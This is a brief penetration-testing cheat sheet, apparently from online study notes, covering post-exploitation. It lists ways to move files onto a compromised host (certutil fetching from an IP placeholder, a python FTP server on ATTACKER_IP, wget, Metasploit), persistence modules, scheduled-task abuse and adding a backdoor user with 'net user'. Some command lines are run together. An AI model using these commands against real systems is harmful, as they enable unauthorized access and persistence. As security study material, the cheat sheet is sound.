Post Exploitation
File Transfers
Certutil
certutil.exe -urlcache -f http://IP_ADDRESS/FILE FILE
HTTP
python -m http.server 80
Browser
Navigate directly to file
FTP
python -m pyftpdlib 21 (ATTACKER_IP)
Linux
wget
Metasploit
Upload / Download feature
Maintaining Access
Persistence Scripts
run persistence -hexploit/windows/local/persistenceexploit/windows/local/registry_persistence
Scheduled Tasks
run schedulemerun schtaskabuse
Add a user
net user USERNAME PASSWORD /add
Pivoting
Last updated